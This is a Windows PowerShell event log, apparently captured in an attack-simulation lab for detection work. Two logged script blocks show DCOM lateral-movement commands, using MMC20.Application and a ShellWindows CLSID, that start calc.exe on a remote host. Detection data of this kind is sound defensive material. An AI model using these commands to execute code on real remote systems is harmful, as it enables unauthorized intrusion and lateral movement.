11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4106 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Stopping Command OpCode=On create calls RecordNumber=639283 Keywords=None Message=Completed invocation of ScriptBlock ID: 819085bd-5f95-489d-a836-6838c03cc72f Runspace ID: 837667f6-3fc3-4c50-a633-9d23ea93600d 11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4105 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Starting Command OpCode=On create calls RecordNumber=639282 Keywords=None Message=Started invocation of ScriptBlock ID: 819085bd-5f95-489d-a836-6838c03cc72f Runspace ID: 837667f6-3fc3-4c50-a633-9d23ea93600d 11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4104 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Execute a Remote Command OpCode=On create calls RecordNumber=639281 Keywords=None Message=Creating Scriptblock text (1 of 1): $global:? ScriptBlock ID: 819085bd-5f95-489d-a836-6838c03cc72f Path: 11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4106 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Stopping Command OpCode=On create calls RecordNumber=639280 Keywords=None Message=Completed invocation of ScriptBlock ID: 94cfa320-c593-4dbc-b9fb-3a4a4183e40b Runspace ID: 837667f6-3fc3-4c50-a633-9d23ea93600d 11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4105 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Starting Command OpCode=On create calls RecordNumber=639279 Keywords=None Message=Started invocation of ScriptBlock ID: 94cfa320-c593-4dbc-b9fb-3a4a4183e40b Runspace ID: 837667f6-3fc3-4c50-a633-9d23ea93600d 11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4104 EventType=3 Type=Warning ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Execute a Remote Command OpCode=On create calls RecordNumber=639278 Keywords=None Message=Creating Scriptblock text (1 of 1): [activator]::CreateInstance([type]::GetTypeFromProgID(‘MMC20.application’,’10.0.1.15’)).Document.ActiveView.ExecuteShellCommand(‘c:\windows\system32\calc.exe’, $null, $null, ‘7’) ScriptBlock ID: 94cfa320-c593-4dbc-b9fb-3a4a4183e40b Path: 11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=40962 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Console Startup OpCode=Stop RecordNumber=639277 Keywords=None Message=PowerShell console is ready for user input 11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=53504 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Named Pipe IPC OpCode=Open (async) RecordNumber=639276 Keywords=None Message=Windows PowerShell has started an IPC listening thread on process: 1604 in AppDomain: DefaultAppDomain. 11/16/2021 03:34:41 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=40961 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Console Startup OpCode=Start RecordNumber=639275 Keywords=None Message=PowerShell console is starting up 11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4105 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Starting Command OpCode=On create calls RecordNumber=639288 Keywords=None Message=Started invocation of ScriptBlock ID: 9a8af736-a125-4025-886f-518418002e0d Runspace ID: 1f8eb258-42d0-4acc-b37a-fd4c10b2625b 11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4104 EventType=3 Type=Warning ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Execute a Remote Command OpCode=On create calls RecordNumber=639287 Keywords=None Message=Creating Scriptblock text (1 of 1): [activator]::CreateInstance([type]::GetTypeFromCLSID(‘C08AFD90-F2A1-11D1-8455-00A0C91F3880’,’10.0.1.15’)).Document.Application.ShellExecute(‘cmd.exe’,’/c calc.exe’,’C:\windows\system32’,$null,0) ScriptBlock ID: 9a8af736-a125-4025-886f-518418002e0d Path: 11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=40962 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Console Startup OpCode=Stop RecordNumber=639286 Keywords=None Message=PowerShell console is ready for user input 11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=53504 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Named Pipe IPC OpCode=Open (async) RecordNumber=639285 Keywords=None Message=Windows PowerShell has started an IPC listening thread on process: 6076 in AppDomain: DefaultAppDomain. 11/16/2021 03:34:52 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=40961 EventType=4 Type=Information ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=PowerShell Console Startup OpCode=Start RecordNumber=639284 Keywords=None Message=PowerShell console is starting up 11/16/2021 03:34:53 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4106 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Stopping Command OpCode=On create calls RecordNumber=639292 Keywords=None Message=Completed invocation of ScriptBlock ID: aa5cf934-2d4e-4c77-ba7d-261522a86717 Runspace ID: 1f8eb258-42d0-4acc-b37a-fd4c10b2625b 11/16/2021 03:34:53 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4105 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Starting Command OpCode=On create calls RecordNumber=639291 Keywords=None Message=Started invocation of ScriptBlock ID: aa5cf934-2d4e-4c77-ba7d-261522a86717 Runspace ID: 1f8eb258-42d0-4acc-b37a-fd4c10b2625b 11/16/2021 03:34:53 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4104 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Execute a Remote Command OpCode=On create calls RecordNumber=639290 Keywords=None Message=Creating Scriptblock text (1 of 1): $global:? ScriptBlock ID: aa5cf934-2d4e-4c77-ba7d-261522a86717 Path: 11/16/2021 03:34:53 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4106 EventType=5 Type=Verbose ComputerName=win-dc-128.attackrange.local User=NOT_TRANSLATED Sid=S-1-5-21-1166625382-1442148322-2337405042-500 SidType=0 TaskCategory=Stopping Command OpCode=On create calls RecordNumber=639289 Keywords=None Message=Completed invocation of ScriptBlock ID: 9a8af736-a125-4025-886f-518418002e0d Runspace ID: 1f8eb258-42d0-4acc-b37a-fd4c10b2625b